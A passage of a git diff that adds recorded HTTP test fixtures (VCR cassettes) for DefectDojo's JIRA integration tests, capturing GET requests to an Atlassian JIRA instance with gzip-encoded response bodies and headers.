x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - f128cd57-9b0a-4db4-bae6-17c2b6659bfb + x-envoy-upstream-service-time: + - '47' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - b365171d3f3e9b06 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:05 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 43f057be-c90a-43cb-9beb-bbc4be775792 + x-envoy-upstream-service-time: + - '171' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/latest/issue/NTEST-458 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - fabfa17f381d766a + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:06 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 43d78ec4-e31f-4434-8a3f-c3745237c3ee + x-envoy-upstream-service-time: + - '187' + status: + code: 200 + message: OK +version: 1 diff --git a/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_engagement_epic_mapping_disabled_no_epic_and_push_findings.yaml b/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_engagement_epic_mapping_disabled_no_epic_and_push_findings.yaml new file mode 100644 index 00000000000..c8fe89f0bac --- /dev/null +++ b/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_engagement_epic_mapping_disabled_no_epic_and_push_findings.yaml @@ -0,0 +1,1654 @@ +interactions: +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uuttlJNm23uYkeVGQV2j2JSNpOsJImpUmFZdn/boKL623em+/N + Y06kUx4PiyGSfIYwe7nZDKixD4P7clQFo7wflaUWA8nINy5+dDbCDIBRoJA3+9vX5uGlvW7369TF + ici3BGWQwXtGBpyNO05oQ3ucMR64M24dYqhbRzP8RohMgUJczHsVEsiBsxx4zsuWMckruRUUAG4g + wjHvcYm97Thd2W0OrOUgRSGhokKUf2w/PVrtIijKoqg00xpR7OpaK5E0KlbxstjxKHjR12X9ryCY + 1PA0Loqkd7RaTXh2vUr2iZjLRNB+HBpyPv8AAAD//wMA9PL8nVoBAAA= + headers: + ATL-TraceId: + - 148868023280185d + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:07 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 0cfd3c8d-f2a7-4d00-b0c6-3298146d3087 + x-envoy-upstream-service-time: + - '30' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + H4sIAAAAAAAAA7SW327aMBTGXyXyNVTdboa47TQJqZqmtuouEJpMOAS3iYNshxZVfZq9z55px7Hj + P8RhHS0XVZXPh5zv9/lgPH8hbEWmRCqqGplTBUUt9vmG8gJW+ERG5BH2xws4rQArbtuK7MqWZFem + BgvyRqq6ItM1LSWMSC1WIOiyBKdwumOFUZRoUJBABfYIlLykjYTv2EqS6dza6XrZVl+1nwV+Ot9A + Rcn0haj9VlvTRhWrtFm5lwqqY0CvryMbCpOygfYVXQqhYrFnWsrujDZMaij+HzTs2P5L8YVFDtCL + nmhLBXDlcNyjZfnRPQ9zvGXHbM0BiW22cGb0jsht6CdUrKU7lLJbq53Dlu+ZSpY31RJEGKuvD2IV + 9QPkQa7uuQvWCe9DSI5I1y3l3ztxAJ3k7a/Z8z0IyWouHUKsWYxv7DnbeXWY5dRp912TNFQIusfG + DEmwnlgvIV3o2xPSohBQ2FMgnrnkkuX98zs79/ylMPtDlzDp4eKz0IH15PQ5/W6s5EYeNPdfegGy + Lhtlds0YjSRr8ibUhv2dOmdBy9QGRI7cJgSqD994WzMoV78+XV5+/uKwUivdoUZFASrDkIQeq4Yr + QbksMa2Vttiv6BIwMB8QQL6et54W+PKoVyoO+zvfmSB5XV1QVVIpGeUXD9t6in9jszxugcdLKqFk + HMYxwQwja/sOBzgZDFCvxAEC19eL4fjM+rnCmwTh6U4fHV3ovgtu4oPz4xhd1Hpy+I3anes+1uva + CrrdUCqH97GDN3jOp1o8CooLDjFULN1PlLIbq52Bz7dM8fQPbF9/cJ1ETCVYHh2AiQW/aa2YqeNc + vUm2Jf/iSsEk3MR3ynDN0+FMq3sGT+2EGa5IskTXqGVOHCZ6y04lf1DDrim81OwFHwnmjir8rL8R + +edu5lpBHL8Jnc5h+uHrUxTejB85K3kCtcG55JSVjiFULMWsokX7IsvwFwAA//+0mVGPmzAMgP8K + 2juotFKl9m2qdtrDaTrd9obugatomx5HUOC07t8vCQ5xSAzcVt4gDtj5bGI73HMNNu0fRaG2594Q + ew9mHPqB/7MjFOVIG1x9qlM0T9M5a2XXFZDACn/WgukqMpCvetlSuWqlchVoCa17WFlfG6fy0nmr + /nNjTSIL0aK68LouRHJlIt+fL3Hjmm+S1YomlpLElASIPZSy7tVuCyCzwqWYpYqZVQNX2eFSHN9e + +a1oXmah5DXsog5MVARIiEldfpxZlXQxlyAm6qXN/v2jbNmxV+yRTmnSa5K0kgDp7PD96/Ovl0h9 + FxE/RQ9MyG1aZp9a9lHqYwg4YPKZu/tlUuP4hMwMn/SwgGHlZfD4OuxRtCmM+bC4tYm0X7SsOu+1 + DqPCqQKNz9bWZ/Lz4YK1tndDA+ChJztibPA3yH8F26sLrR7Zgs4QYIyOuw0Zd0oyiDvdZbMq6nrT + 8Xjz5i4WZ56msCBzb1E8bcLxlFfYjZOhpEKPVV1H7UXRBldgr0Vp65X+Flg/mvv7xw+oCq51sBuq + 0rE641iCh+lI2pKRpCQmu7bqzPmJyzxExM9gxt2jBny+1ZnW1YVvsx+6WQhHRt9IjAXHRK44lTz3 + c/GW5JuSfLXE4VurJUSy/mfv3ZZGcvZmLsQ7RbwHOucDJiqba/M7btSbY/1m7+NLR6CS50BaAlC7 + fwdHXnJlUoClO2EphPoUCKsKkes/3LnkdK8Yu7YbcPT5T0qe/2iJyYb6X0L0yKq3MDh3wlLg9AkQ + VhUCN77bh06A+t8yLjR09jNEsyOhKQlAe84pWiBZCtNOYdI6ZvIhokp2GmVx47HA5ho6O9T3yoSJ + dh5ofd1Bw0TawioZ2NE3f6vyE+ScDjTYCX8RRhHS45gUQuOfKzmP2BU7/wdkZSbzQ156CKZmaSZ/ + AQAA//8Cz3r4QyVpHCrE+Rm/sxGBgDQzBfEvkgDUa45paanJJcW0ncRKBFuSmkLhTBbcjQgfgovU + HGBBg/AjihDUl6CiKDVFAVyiE/AiAAAA//+0WslSwzAM/ZV+AD2EtheuhRM3liOnxMNkOkAIpd+P + F1mLI9Ekk5zaSE6l9+xY1ktnQoxR7R2vACdylFpisrKF7LfF90/H1iwZ8hySZXlgGE7D5QfKhZkH + U/6/Xej1SOeia8j+FQ128mOeJzV7igbfJulc+W5Cgz1HAoOXgGXQgS0IBWJpuWMamDlYWH38+vCN + t0tnNiiM3AQAjtxmg5i7mDCkCqN8Smg0Q8ayLraBgEpsAskAyB7jhQ1pzLyoW3bI4CYFzJ+UyZso + wYOtmpdixQmpY+1RmoclgeQMioI8SEybu2GRUm+lKWvcT923WQlMNEgboL8XRhv33DXJg2rIhv05 + v8M+gZoSePQAuCf37SvSOf9bSjuJyhFrnUijHC5iqVw0cC53fZ/GRgelVRzmfXm4tLXzhJ3uLt02 + LQccng+qtipemap49ACJD11bbyJdKoPcvRZ9URmnQCp3U9pFf7B3/te2UQoaEGaL25UpbkcPJ+w/ + ZVEOWIu0WyQNQmm06S8LrtCmS4MVE5hLdnYmb8HDeTva4oTwr8XaDllLkTTSZq01XZhgcmrJzN7k + LHg4Z7Yswd1rMbZHxuwD+pSWOz2ZPOdM1l623B5tfUoTQXWeGYGil6CWM3NOY0SNgyHXmNAgF7mI + uo12e/IP5uQHDyB7Dv912sDLHmX2hX+t6T8kPZRFoov4BkxXnps/AAAA///EW8FOwzAM/ZX9QKVe + uHBD7MgBIW6cui3AxLpWTTs+iP/hm2hdJ7ETe+s2ld2IbcX2q+OW54xHFdNUE3jnYYe+VL4IveoK + 5U4FNleBBQ0C+wi3sxf49hWQ5QYzQZsDtNwVWb0tm6reVN97GWC5s58HsTU7eosY4c2PwKty+6Dh + 8DZbq7QtbjAXvMDkc1dkdTt4Cctvzbpjg1oicE0AJYsncyAfM5P620S8drCzhIILZ7Qgbc7HqZeK + OrEATVQqphgviBwpFmcyV7nA1CJ2xta3Kxl9vpGr8w3QcJjtiReKZDYX3DDrkBwmsnEe3q/LWgae + kE9XQJ/s4sAnc5KibYv1Z8nu+1MRwv1AZWec14nfI8Sn/NUfU0EsxkA3BinJkJLjCdOiaTHv35/F + fw1ApLRTFkWOVz9M6twLNPwwDVTazgxH/vSJSm3nOlYwG1O9yopbHzAyarNdWRb0Ryd+7V6HXqAX + 1aUQOmcSBCmP5axJNQ0XO+GfQKwhv3aV4wV68FNOhBi98yZF30WTBmdLgV+1hSWDICLw0K8yJ7ou + fvFEB49SBnFLk2dAfouQWGPqqmkh/TExIsDEXoJEz+vSovLupKzi5+KNhYZcN1X/lw1PSNKERvwc + hHpSFz8sKRkSRtqAvVJvvirlCxrMbDl8iVY1vsuEjrthBnO1WSB8qSsJEIEWETumhUVGtsu2+9Z8 + wA8+9tlodN+rseWs3/22roXqJHCuksCgQVhfTVHKeKLmbCD/AAAA//8iMiDBQ79QO0BUNIjAXgvh + Dc4SoLZiq6JcXTADdf0LSAgjxHCPAhvgHAUGy0BDzL8oPTEvswocRTjGgdGV0CoMwSPBqJZhDT/0 + pZOI6Yh8JM24wxh5PgJJsy6SbgAAAAD//8RcwQ6CMAz9FY56MOEXjHow8eBFL8YDCYSYCCMi3Ph3 + 2WjXjbVqCMYbXYG+92pYV4YOTxRabhvHYtvYeEDoddU/O/TmBV5k1z27wO7N7fHl1AsRHU1rKlqY + rfR9NRXpZ3m91KmAtEi7dUdpgDlA0PybwspA0Lfh22Wx3ISOxSa08UAG9kWVmEUpI7/1za49qGja + zzbKcPC/hbjTos7K9vZQpbcY9MdAvp03iJjCyXiqUG5QTo6wdHWvIEJp4/9FB9lAZNtk4+XLfCxS + swEAY3I8ILRlgecSg6BECiuj35ZFFJAjwBVIXF2kCu9HRTZw2NgBmUKQBjjlYx4wGkcAfPWqSnIv + FXgRkWjVM6M8oAUEzmDK8KdnYAjFoUcQFvUwQJj1R7Z3Re+byAbcB5VH+svgt9CnKs9BHs8VhMiS + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 29303b66815658c4 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:07 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 951f9a6e-4a63-49f0-87cd-ce5c4a9665c8 + x-envoy-upstream-service-time: + - '47' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/createmeta?projectKeys=NTEST&issuetypeNames=Task&expand=projects.issuetypes.fields + response: + body: + string: !!binary | + H4sIAAAAAAAAA+xWS0/jMBD+K1EOnCpCS8WiShVCy66EdoWQKFwQB5NMqKljBz/adBH/fT2JE7vQ + ZbPlsgd6qWcyj28envFzDFVJeBZP4lKKR0i1igf+OLl99gJUKQN6XQKKKGC55c21LtUkSTLIrUIm + HsU+0YwoRQnf56ATCUonpKTJKHFWk+GB/VkTFI22xALWlrqYfbuaWYqTAix5zanW1gA6JEuiibyW + zKJ6jsfH1fi4j38FqZHQ+m6MnJQ0m9aO9xrGOZLjgy/WzWhcjcY7G1b0F0xVQRjbU+7/HV/Do2p4 + 9DFfVevMHd7xdjiqDkcf81ZARk1hvbnDH729DMJuwS7aoV86C3XHjMKOQSIDlUpaaiq45Z5GdQIG + UUaVpjzVUUkhhUjk0UrIxT5qp4Lb/umDwqVgSWG1Jf4g2MPhsSNnFui0g+x7eEbUwlKGa0m4YkRD + drHxRZl7jadJTpiCgb9vOQWWYeu7g217ZYqCyDUeJTwZKsEKammsmkrnUBD8UvufxEpLyh/QwVpp + KJDjtF86cFeO096/VmIQz4k6g5wYpm8IM9ChEyVIgjnHstqq6vguLHYvZGGWOnCe6eGdIy/CzHYI + Q91eGO/s6GBMrCCrhT67cVvPtTbiSW3kBWuaiqIUHDiugbCoTuVNVYmUBDuH2npaFa8fVjkw6sv8 + 1TPbMgdyPesckyxDT4D+JBRiCfGW2mNkRGuSzguEtlNkgX4QWsD1oZ2Gok1oG9q9QkPMG/3VB/Tb + 6x+a8AjPAm4LMZTsibEbBW5t9BoErWwAsmV5gJedUAPOK/0DsLeNsNMQ+NgTxmnj3fzRjFuR6xWR + 9RykRcmonfS+pJ8vnm2+/tcXTz0z64nLKF/sODMD/derseH6a/HT0pBF9Yr0c3PDADFa4GxloKHn + qnm98JKSpguQJzY/0k4sdxdt1HtqLlZX5h4XyiXBb1O85CFbNRynWgO1bT/lxlbtyYBcT3vfYZzt + mN+cVjcgVcPeJcHLRjvMbmjTp/c7rSIn7LMbivaF3iykZjn9ZS3ZMjxwgH6RGQUyDKPTDpZPy+pW + 